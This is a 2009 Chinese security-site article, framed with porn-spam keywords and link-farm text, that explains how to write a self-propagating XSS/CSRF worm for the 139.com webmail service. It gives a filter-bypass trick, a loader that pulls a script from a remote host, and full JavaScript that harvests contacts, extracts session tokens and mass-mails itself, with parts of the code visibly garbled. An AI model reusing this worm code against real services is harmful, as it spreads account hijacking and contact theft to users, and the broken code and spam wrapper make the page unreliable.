成人免费xxxxx在线视频软件_久久精品久久久_亚洲国产精品久久久_天天色天天色_亚洲人成一区_欧美一级欧美三级在线观看

139郵箱蠕蟲編寫實例

安全 應用安全
我們經常會用到的mail.139.com,由于對郵件正文過濾不嚴,導致存在xss漏洞。他們盡管實現了對style="xss:expression"進行過濾,但是可以通過添加/* */繞過,如:。在添加/* */后,該腳本能夠在IE瀏覽器執行

139郵箱蠕蟲編寫實例

Author:[sh0wrun],[woyigui]

Date:2009-09-09

聲明:該漏洞已報告并已修復,切勿用于非法目的。

原理分析: 

我們經常會用到的mail.139.com,由于對郵件正文過濾不嚴,導致存在xss漏洞。他們盡管實現了對style="xss:expression"進行過濾,但是可以通過添加/*  */繞過,如:。在添加/* */后,該腳本能夠在IE瀏覽器執行。
同時,經過分析發現,mail.139.com中發送郵件的功能存在CSRF弱點;可以通過Ajax技術獲取發送郵件所需要的mid值。另外郵箱的“通信錄“中的聯系人郵件可以直接通過javascript取出。
滿足了編寫csrf worm的3個條件,接下來的工作,就是通過編寫javascript代碼來實現了。

跨站代碼:

該部分要實現的功能就是,觸發瀏覽器去讀取遠端的js腳本,并且執行該腳本:

Original:

var ig =document.createElement("script");ig.src="http://192.168.9.104/woyigui/139.js";try {document.getElementsByTagName("body")[0].appendChild(ig);} catch (e) {document.documentElement.appendChild(document.createElement("body"));document.getElementsByTagName("body")[0].appendChild(ig);}

對該部分編碼按照10進制進行編碼,以避免關鍵字被替換,并調用:

該部分代碼,需放置在郵件正文中傳送。

腳本功能的實現:

主要實現了如下功能:

1.通過腳本,讀取聯系人的郵箱地址。

該部分信息,可以通過top.LinkManList.concat()獲取。

2.通過腳本,獲取sid值

該部分信息,可以通過window.top.location.href,配合正則表達式獲取到。

3.獲取發送郵件所需要的mid值

在獲取到sid值后,通過script打開"寫郵件"頁面,讀取mid值。

4.發送郵件

發送郵件功能只驗證mid值,因此在獲取到正確的mid值后,連同獲取到的聯系人一起,構造post數據,發送郵件。
5.改寫郵件轉發規則和自動回復規則

在有正確的sid后,構造post。

完整代碼:

var xssed = false; 
if (typeof XSSflag != "undefined"){ 
  xssed = true; 
} 
var XSSflag = [ 
  {name: "version", url: "1.0"}, 
]; 
if ( xssed != true ) {   
  var xmlhttp; 
  //create XHR 
  function createXMLHttp(){   
      try { 
        xmlhttp = new XMLHttpRequest(); 
      } catch (e) { 
         var XMLHTTP_IDS = new Array('MSXML2.XMLHTTP.5.0', 
                     'MSXML2.XMLHTTP.4.0', 
                     'MSXML2.XMLHTTP.3.0', 
                     'MSXML2.XMLHTTP', 
                     'Microsoft.XMLHTTP' ); 
        var success = false; 
        for (var i=0;i < XMLHTTP_IDS.length && !success; i++) { 
          try { 
             xmlhttp = new ActiveXObject(XMLHTTP_IDS[i]); 
              success = true; 
          } catch (e) {} 
        } 
        if (!success) { 
          throw new Error('Unable to create XMLHttpRequest.'); 
        } 
     } 
  } 
  function domid (dourl) { 
    createXMLHttp();   
    var tmp = ""; 
    xmlhttp.open("GET", dourl, false);   
    xmlhttp.setRequestHeader("Content-Type","application/x-www-form-urlencoded;"); 
    xmlhttp.setRequestHeader("Connection", "close"); 
    xmlhttp.send(null); 
    setTimeout( tmp = xmlhttp.responseText,500); 
    return tmp;     
  } 
  function startRequest(doUrl, tomail, subject, Content, account, mid, sid ){   
    createXMLHttp();   
    var params = "funcid=compose&sid="+ sid +"&mid="+ mid +"&hidRemoteIp=&ishtml=y&optype=
send.x&idOpType=&text="+ Content +"&destcgi=
&funcid=compose&netfdrhost=&to="+ tomail +"&cc=&bcc=&subject="+ subject +"&year=
&month=&day=&hour=undefined&compinfo_minute=&chkHtmlMessage_text=y&chkHtmlMessage=y&ifsavetosent= 
   xmlhttp.setRequestHeader
("Content-Type","application/x-www-form-urlencoded;"); 
    y&account="+ account +"&destcgi=&netfdrhost=&split_rcpt=n&return_receipt=0&priority=0"; 
    
xmlhttp.open("POST", doUrl, false);   
xmlhttp.setRequestHeader("Content-length", params.length); 
    xmlhttp.setRequestHeader("Connection", "close"); 
    xmlhttp.send(params); 
  } 
  function doMyAjax()   
  {   
     var strPer = '/coremail/cgi/attachfapps'; 
     var tomail = ';'; 
     var subject = "test20"; 
     var Content = "";
     var account = ""; 
     var sid = window.top.location.href.replace(/.*&sid=(.*)/,"$1"); 
     var tmpmid = domid("/coremail/fcg/ldmmapp?funcid=compose&sid=" + sid );   
     var mid="",text=""; 
     text=tmpmid.split("\n"); 
    for (var i=0;i < text.length; i++) 
    { 
      var patt=/name=\"mid\" value=\"/; 
      if ( patt.test(text[i])) 
      {   
        mid=text[i].replace(/.*name=\"mid\" value=\"(.*)\".*/, "$1"); 
        break; 
      } 
    } 
    var mail_address=top.LinkManList.concat(); 
    for (var i=0,len=mail_address.length;i;"; 
      } 
    } 
     try { 
       startRequest(strPer, encodeURIComponent(tomail), encodeURIComponent(subject), 
encodeURIComponent(Content), encodeURIComponent(account), mid, sid );     
     } catch (e) { 
       alert("send data error!"); 
     } 
  } 
  doMyAjax(); 
} 

【編輯推薦】

  1. 深入了解網絡中的蠕蟲病毒
  2. Conficker蠕蟲作者可隨時引爆“網絡核武器”
  3. 風暴蠕蟲可能向安全人員實施報復性攻擊
責任編輯:安泉 來源: 黑客防線
相關推薦

2015-07-20 10:27:50

DockerDockerfile創建實例

2020-04-03 10:14:57

內存蠕蟲代碼web安全

2011-04-06 09:39:49

mysql5存儲

2022-01-07 06:12:08

RPC框架限流

2020-03-30 17:43:13

開源開源項目編寫文檔

2011-06-16 17:54:30

Qt Mplayer

2016-09-02 09:14:26

2010-09-15 08:52:03

2009-07-07 22:52:21

2017-02-15 08:20:13

2010-12-17 10:07:55

2009-07-07 11:04:12

百變蠕蟲病毒卡巴斯基

2014-05-14 13:13:59

2011-07-05 17:54:43

QT Sqlite ARM

2011-08-09 10:51:05

2010-09-27 11:23:53

2010-10-12 16:14:37

蠕蟲病毒計算機安全

2014-06-20 11:13:11

2017-05-14 21:40:48

2019-08-14 08:03:49

LinuxShell腳本web服務
點贊
收藏

51CTO技術棧公眾號

主站蜘蛛池模板: 久草在线视频中文 | 在线观看中文字幕视频 | 亚洲天天干 | 综合另类| 成人免费视频一区二区 | 在线成人av | 国产高清精品一区二区三区 | 91免费观看在线 | 欧美一级做性受免费大片免费 | 久草视频在线播放 | 欧美成人黄色小说 | 皇色视频在线 | 国产一级片在线观看视频 | 青春草在线 | 亚洲成人自拍 | 999久久| 色婷婷久久久亚洲一区二区三区 | 精品无码久久久久久国产 | 成人在线免费看 | 国产激情在线观看 | 国产欧美日韩精品一区 | 欧美精品欧美精品系列 | 一区中文字幕 | 国产视频一区二区 | 性一交一乱一伦视频免费观看 | 天天曰天天干 | 性色的免费视频 | 免费成人高清在线视频 | 免费成人在线网站 | 激情五月激情综合网 | 欧美精品一区二区三区在线播放 | 精品国产91久久久久久 | 超碰成人免费观看 | www.久久久.com| 黄色大片网站 | 电影91久久久 | 欧美日韩在线电影 | 精品国产精品三级精品av网址 | 在线视频亚洲 | 中文字幕国 | 日韩高清一区 |